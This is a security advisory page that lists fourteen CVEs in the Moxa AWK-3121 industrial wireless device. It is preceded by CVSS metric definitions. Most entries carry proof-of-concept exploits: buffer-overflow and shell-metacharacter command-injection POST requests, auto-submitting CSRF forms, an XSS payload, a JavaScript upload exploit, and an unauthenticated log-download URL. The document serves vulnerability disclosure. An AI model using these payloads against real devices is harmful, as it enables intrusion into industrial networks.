The vulnerable system is bound to a protocol stack, but the attack is limited at the protocol level to a logically adjacent topology. This can mean an attack must be launched from the same shared proximity (e.g., Bluetooth, NFC, or IEEE 802.11) or logical network (e.g., local IP subnet), or from within a secure or otherwise limited administrative domain (e.g., MPLS, secure VPN within an administrative network zone). One example of an Adjacent attack would be an ARP (IPv4) or neighbor discovery flood leading to a denial of service on the local LAN segment (e.g., CVE-2013-6014).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: Moxa AWK-3121 1.14 Information Disclosure / Command Execution
1.CVE-2018-10690
[Suggested description]
An issue was discovered on Moxa AWK-3121 1.14 devices.
The device by default allows HTTP traffic thus
providing an insecure communication mechanism for a user connecting to
the web server. This allows an attacker to sniff the traffic easily and
allows an attacker to compromise sensitive data such as credentials.
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[VulnerabilityType Other]
HTTP traffic by default
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[Vendor of Product]
Moxa
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[Affected Product Code Base]
AWK-3121 - 1.14
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[Affected Component]
Web Server -- iw_webs (Goahead)
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[Attack Type]
Remote
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[Impact Information Disclosure]
true
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[Attack Vectors]
An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning.
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[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
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[Discoverer]
Samuel Huntley
2. CVE-2018-10691
[Suggested description]
An issue was discovered on Moxa AWK-3121 1.14 devices.
It is intended that an administrator can download /systemlog.log (the system
log). However, the same functionality allows an attacker to download
the file without any authentication or authorization.
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[Additional Information]
POC
http://192.168.127.253//systemlog.log
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[Vulnerability Type]
Incorrect Access Control
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[Vendor of Product]
Moxa
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[Affected Product Code Base]
AWK-3121 - 1.14
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[Affected Component]
Web Server -- iw_webs (Goahead)
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[Attack Type]
Remote
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[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can navigate to URL and download the systemlog file without any authentication or authorization
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[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
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[Discoverer]
Samuel Huntley
3. CVE-2018-10692
[Suggested description]
An issue was discovered on Moxa AWK-3121 1.14 devices.
The session cookie "Password508" does not have an HttpOnly flag.
This allows an attacker who is able to execute a cross-site
scripting attack to steal the cookie very easily.
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[VulnerabilityType Other]
Missing HttpOnly flag on session cookie
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[Vendor of Product]
Moxa
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[Affected Product Code Base]
AWK-3121 - 1.14
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[Affected Component]
Web Server -- iw_webs (Goahead)
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[Attack Type]
Remote
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can use cross-site scripting attack to access the session cookie "Password508" which can allow an attacker to login into the device.
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[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
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[Discoverer]
Samuel Huntley
4. CVE-2018-10693
[Suggested description]
An issue was discovered on Moxa AWK-3121 1.14 devices.
It provides ping functionality so that an administrator
can execute ICMP calls to check if the network is working correctly.
However, the same functionality allows an attacker to execute commands
on the device. The POST parameter "srvName" is susceptible to a buffer
overflow. By crafting a packet that contains a string of
516 characters, it is possible for an attacker to execute the attack.
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[Additional Information]
POC
POST /forms/webSetPingTrace HTTP/1.1
Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0
srvName=AAAAAA (etc.) EEEEEE&option=0&bkpath=%2Fping_trace.asp
------------------------------------------
[Vulnerability Type]
Buffer Overflow
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
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[Discoverer]
Samuel Huntley
5. CVE-2018-10694
[Suggested description]
An issue was discovered on Moxa AWK-3121 1.14 devices.
The device provides a Wi-Fi connection that is open and does not use
any encryption mechanism by default. An administrator who uses the
open wireless connection to set up the device can allow an
attacker to sniff the traffic passing between the user's computer and the
device. This can allow an attacker to steal the credentials passing
over the HTTP connection as well as TELNET traffic. Also an attacker
can MITM the response and infect a user's computer very easily as
well.
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[VulnerabilityType Other]
Open WiFi Connection
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[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK 3121 - 1.14
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[Affected Component]
Device
------------------------------------------
[Attack Type]
Remote
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[Impact Information Disclosure]
true
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[Attack Vectors]
An attacker can monitor the Wifi channels using Kismet or some other
opensource software and an wireless card in monitor mode and sniff all
the traffic including HTTP traffic as well as SSH and Telnet traffic.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
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[Discoverer]
Samuel Huntley
6. CVE-2018-10695
[Suggested description]
An issue was discovered on Moxa AWK-3121 1.14 devices.
It provides alert functionality so that an
administrator can send emails to his/her account when there are
changes to the device's network. However, the same functionality allows
an attacker to execute commands on the device. The POST parameters
"to1,to2,to3,to4" are all susceptible to buffer overflow. By crafting
a packet that contains a string of 678 characters, it is
possible for an attacker to execute the attack.
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[Additional Information]
POC
POST /forms/web_SendTestEmail HTTP/1.1
Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f
server=server.mail.com&username=test&password=test&[email protected]&to1=AAAAAAAAAA (etc.)
------------------------------------------
[Vulnerability Type]
Buffer Overflow
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK 3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use XSRF form to trick an admin into submitting the request and execute the buffer overflow
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
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[Discoverer]
Samuel Huntley
7. CVE-2018-10696
[Suggested description]
An issue was discovered on Moxa AWK-3121 1.14 devices.
The device provides a web interface to allow an administrator to
manage the device. However, this interface is not protected against
CSRF attacks, which allows an attacker to trick an administrator into
executing actions without his/her knowledge, as demonstrated by the forms/iw_webSetParameters and
forms/webSetMainRestart URIs.
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[Additional Information]
POC to change name of the device
<html
<body
<form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded"
<input type="hidden" name="iw_board_deviceName" value="AWK-ROMEO" /
<input type="hidden" name="iw_board_deviceLocation" value="" /
<input type="hidden" name="iw_board_deviceDescription" value="" /
<input type="hidden" name="iw_board_deviceContactInfo" value="" /
<input type="hidden" name="Submit" value="Submit" /
<input type="hidden" name="bkpath" value="/sysinfo.asp " /
</form
<script
setTimeout("document.forms['f'].submit();",1);
</script
</body
</html
<html
<body
<form id="f" action="http://192.168.127.253/forms/webSetMainRestart" method="GET" enctype="application/x-www-form-urlencoded"
<input type="hidden" name="SaveValue" value="1" /
</form
<script
setTimeout("document.forms['f'].submit();",1);
</script
</body
</html
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[Vulnerability Type]
Cross Site Request Forgery (CSRF)
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[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Impact Escalation of Privileges]
true
------------------------------------------
[Impact Information Disclosure]
true
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[Attack Vectors]
An attacker can trick an administrator of the device to visit an
attacker controlled page while connected to the network and thus trick
to change the password or any other setting
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[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
8. CVE-2018-10697
[Suggested description]
An issue was discovered on Moxa AWK-3121 1.14 devices.
The Moxa AWK 3121 provides ping functionality so that an administrator
can execute ICMP calls to check if the network is working correctly.
However, the same functionality allows an attacker to execute commands
on the device. The POST parameter "srvName" is susceptible to this
injection. By crafting a packet that contains shell metacharacters,
it is possible for an attacker to
execute the attack.
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[Additional Information]
POC
POST /forms/webSetPingTrace HTTP/1.1
Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333
srvName=192.168.127.102;ping -c 8 192.168.127.101;##&option=0&bkpath=%2Fping_trace.asp
------------------------------------------
[VulnerabilityType Other]
Command injection in Ping functionality
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK 3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use XSRF form to trick an admin into submitting the request
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
9. CVE-2018-10698
[Suggested description]
An issue was discovered on Moxa AWK-3121 1.14 devices.
The device enables an unencrypted TELNET service by default. This allows an
attacker who has been able to gain an MITM position to easily sniff the
traffic between the device and the user. Also an attacker can easily
connect to the TELNET daemon using the default credentials if they have
not been changed by the user.
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[VulnerabilityType Other]
Insecure service Telnet enabled by default
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Telnet daemon
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
10. CVE-2018-10699
[Suggested description]
An issue was discovered on Moxa AWK-3121 1.14 devices.
The Moxa AWK 3121 provides certfile upload functionality so that an
administrator can upload a certificate file used for connecting to the
wireless network. However, the same functionality allows an attacker
to execute commands on the device. The POST parameter "iw_privatePass"
is susceptible to this injection. By crafting a packet that contains shell metacharacters,
it is possible
for an attacker to execute the attack.
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[Additional Information]
POC
POST /forms/web_certUpload HTTP/1.1
Cookie: Password508=68abf30ef8176a4248320929e04df562
... 114782935826962
Content-Disposition: form-data; name="iw_privatePass"
;`ping -c 9 192.168.127.103` ##
... 114782935826962
Content-Disposition: form-data; name="bkpath"
/wireless_cert.asp?index=1
... 114782935826962
Content-Disposition: form-data; name="certSection"
certWlan
... 114782935826962
Content-Disposition: form-data; name="rfindex"
0
... 114782935826962
Content-Disposition: form-data; name="Submit"
Submit
... 114782935826962
Content-Disposition: form-data; name="certFile1"
test.txt
... 114782935826962
Content-Disposition: form-data; name="certFile"; filename="blob"
Content-Type: text/xml
<a id="a"<b id="b"hey!</b</a
... 114782935826962--
------------------------------------------
[VulnerabilityType Other]
Command injection in file upload
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use XSRF form to trick an admin into submitting the request
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
11. CVE-2018-10700
[Suggested description]
An issue was discovered on Moxa AWK-3121 1.19 devices. It
provides functionality so that an administrator can change the
name of the device. However, the same functionality allows an attacker
to execute XSS by injecting an XSS payload. The POST parameter
"iw_board_deviceName" is susceptible to this injection.
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[Additional Information]
POC
<html
<body
<form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded"
<input type="hidden" name="iw_board_deviceName" value="AWK<\/td');alert(1);//" /
<input type="hidden" name="iw_board_deviceLocation" value="" /
<input type="hidden" name="iw_board_deviceDescription" value="" /
<input type="hidden" name="iw_board_deviceContactInfo" value="" /
<input type="hidden" name="Submit" value="Submit" /
<input type="hidden" name="bkpath" value="/sysinfo.asp " /
</form
<script
setTimeout("document.forms['f'].submit();",1);
</script
</body
</html
------------------------------------------
[Vulnerability Type]
Cross Site Scripting (XSS)
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.9
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Impact Escalation of Privileges]
true
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
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[Discoverer]
Samuel Huntley
12. CVE-2018-10701
[Suggested description]
An issue was discovered on Moxa AWK-3121 1.14 devices.
It provides functionality so that an administrator
can run scripts on the device to troubleshoot any issues. However,
the same functionality allows an attacker to execute commands on the
device. The POST parameter "iw_filename" is susceptible to buffer
overflow. By crafting a packet that contains a string of
162 characters, it is possible for an attacker to execute the attack.
------------------------------------------
[Additional Information]
POC
POST /forms/web_runScript HTTP/1.1
Cookie: Password508=071b1093656adca3510d5e32f69737ec
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_filename"; filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC"
Content-Type: application/octet-stream
ls -ltr
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_storage"
tftp
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_serverip"
`ping -c 3 192.168.127.101`
... 7e21a62f2905ca
Content-Disposition: form-data; name="bkpath"
/Troubleshooting.asp
... 7e21a62f2905ca--
------------------------------------------
[Vulnerability Type]
Buffer Overflow
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use XSRF form to trick an admin into submitting the request and execute buffer overflow
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
13. CVE-2018-10702
[Suggested description]
An issue was discovered on Moxa AWK-3121 1.14 devices.
It provides functionality so that an administrator
can run scripts on the device to troubleshoot any issues. However,
the same functionality allows an attacker to execute commands on the
device. The POST parameter "iw_filename" is susceptible to command
injection via shell metacharacters.
------------------------------------------
[Additional Information]
POC
<html
<body
<script
function submitRequest()
{
var formData = new FormData();
formData.append("iw_filename", ";`ping -c 9 192.168.127.103` ##");
formData.append("iw_storage", "tftp");
formData.append("iw_serverip", "192.168.1.101");
formData.append("bkpath", "/wireless_cert.asp?index=1");
// HTML file input, chosen by user
formData.append("certFile1", "test.txt");
// JavaScript file-like object
var content = '<a id="a"<b id="b"hey!</b</a'; // the body of the new file...
var blob = new Blob([content], { type: "text/xml"});
formData.append("certFile", blob);
var request = new XMLHttpRequest();
request.open("POST", "http://192.168.127.253/forms/web_certUpload");
request.send(formData);
}
</script
<form action="#"
<input type="submit" value="Submit request" onclick="submitRequest();" /
</form
</body
</html
------------------------------------------
[VulnerabilityType Other]
Command injection in web runscript functionality
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use XSRF form to trick an admin into submitting the request
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
14. CVE-2018-10703
[Suggested description]
An issue was discovered on Moxa AWK-3121 1.14 devices.
It provides functionality so that an administrator
can run scripts on the device to troubleshoot any issues. However,
the same functionality allows an attacker to execute commands on the
device. The POST parameter "iw_serverip" is susceptible to buffer
overflow. By crafting a packet that contains a string of
480 characters, it is possible for an attacker to execute the attack.
------------------------------------------
[Additional Information]
POC
POST /forms/web_runScript HTTP/1.1
Cookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_filename"; filename="XXXX"
Content-Type: application/octet-stream
ls -ltr
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_storage"
tftp
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_serverip"
AAAAAAAAAAAAAAAAAA (etc.)
... 7e21a62f2905ca
Content-Disposition: form-data; name="bkpath"
/Troubleshooting.asp
... 7e21a62f2905ca--
------------------------------------------
[Vulnerability Type]
Buffer Overflow
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
Use XSRF form to trick an admin into submitting the request and execute the buffer overflow
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
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